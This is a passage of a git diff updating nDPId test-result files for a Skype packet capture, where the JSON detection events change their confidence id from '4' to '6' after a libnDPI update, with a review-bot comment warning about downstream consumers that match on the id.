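Review bot: The key inside the `confidence` object on the `detected` and `idle` events changes from `"4"` to `"6"` while its value stays `"DPI"`, so the numeric id is evidently not stable across libnDPI revisions; the same shift appears in the skype.pcap.out hunk that follows. A downstream consumer (detection rule, log pipeline, dashboard) that matches on the id rather than the name would presumably stop matching without raising an error. The commit message names only the new libnDPI revision, so I would add a line to the description or changelog such as `confidence ids renumbered by the libnDPI bump: DPI is now 6 (was 4); consumers should match on the name, not the id`. The five-digit length prefixes (`00801`, `00845`) are unchanged, which is consistent with a same-length substitution.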
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883451 bytes -~~ total memory freed........: 5883451 bytes -~~ total allocations/frees...: 118316/118316 +~~ total memory allocated....: 6017085 bytes +~~ total memory freed........: 6017085 bytes +~~ total allocations/frees...: 121078/121078 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 477 chars ~~ json string max len.......: 850 chars diff --git a/test/results/skype.pcap.out b/test/results/skype.pcap.out index a62ad84dd..6105a9ff6 100644 --- a/test/results/skype.pcap.out +++ b/test/results/skype.pcap.out 
@@ -2,74 +2,74 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skype.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431969639825} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431969641947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969641947,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt5UAAEARP6TAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431969641948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969641948,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5KYAAEAREpPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431969642087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969642087,"pkt":"0NQSxnP1PBXCt3IOCABFAABDTB0AAEARqxnAqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 
-00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1431969642087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969642087,"pkt":"0NQSxnP1PBXCt3IOCABFAABDfx0AAEAReBnAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1431969642244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969642244,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7CqYAAEAR7JjAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 
-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1431969642247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969642247,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7ECYAAEAR5xjAqAEiwKgBAf+SADUAJwCOlegBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1431969642318,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969642318,"pkt":"0NQSxnP1PBXCt3IOCABFAABE3usAAEARGErAqAEiwKgBAfpVADUAMOQoL9MBAAABAAAAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431969642334,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431969642334,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAnAAAEAR9LLAqAEiwKgBAeU5ADUAQzJbSPEBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+t\/gAAEARP0PAqAEiwKgBAcKBADUAKu5ghe0BAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAAAEAAQ=="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 